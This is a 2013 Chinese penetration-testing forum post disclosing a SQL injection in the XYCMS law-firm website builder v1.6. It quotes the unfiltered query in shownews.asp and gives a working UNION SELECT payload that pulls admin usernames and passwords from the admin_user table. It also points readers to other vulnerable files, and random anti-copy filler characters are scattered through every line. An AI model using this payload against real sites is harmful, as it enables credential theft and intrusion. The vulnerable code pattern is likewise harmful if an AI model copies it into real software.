中国网络渗透测试联盟

标题: XYCMS律师事务所建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:28
标题: XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
7 k  V* u" Y" h/ P2 F3 y6 X " [' q& E2 }+ j
淫荡分割线
" X8 \; K' n  G# G! R& _--------------------------------------------------------% j. [' {! ^, q( P

. ?9 [$ [+ y5 W) ]+ `; d审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
; `" {, c3 V6 [$ D( C% f源码地址:http://down.chinaz.com/soft/29233.htm
# D- C5 u  D2 f5 D2 m+ m$ I
: U# V' V6 F2 T# T2 k漏洞文件:shownews.asp
, q1 E5 F6 t# u) u漏洞代码:7-13行
: ?0 ?- L/ u0 E# t. E
  D, |1 O7 F$ }* j# Q" z, Q8 l ' R4 w, H. I9 B( t% X4 v
<%
( m- y8 d$ H- {5 \7 S  V! v1 @% r1 ^id=request.QueryString("id")
1 }0 j* Z/ D7 u: r    % C* @1 a3 k5 q- O/ H4 r* V
set snews=server.createobject("adodb.recordset") . t8 J7 n% {' \4 m" L  U5 P# x
exec="select * from [news] where id="&id, J" @$ \# c8 H: Q3 U6 O& W, f
snews.open exec,conn,1,1" \% p! c, Q9 ~4 G$ u6 }
%>
" v& k& t+ Y; h7 ^4 N 0 i* C2 {  i2 J% b3 M
. w; s+ |! K+ I
什么过滤都没有  直造成注入
( g7 s6 y) r9 k, C2 A- u 8 G3 v+ n3 K& Q- N. |
注入点:http://127.0.0.1:99/shownews.asp?id=xx: R2 z/ g5 w8 B  ^
1 I6 B( C4 q0 K2 Z* O. b# T
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找3 y, _0 D& p" [. {

3 v6 O. t8 @, b1 b + E  L' l* z& \
exp: union select 1,admin,password,4,5,7 from admin_user: M7 }9 `% N4 A) ~4 C+ G
+ [( @' ~; q1 n




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2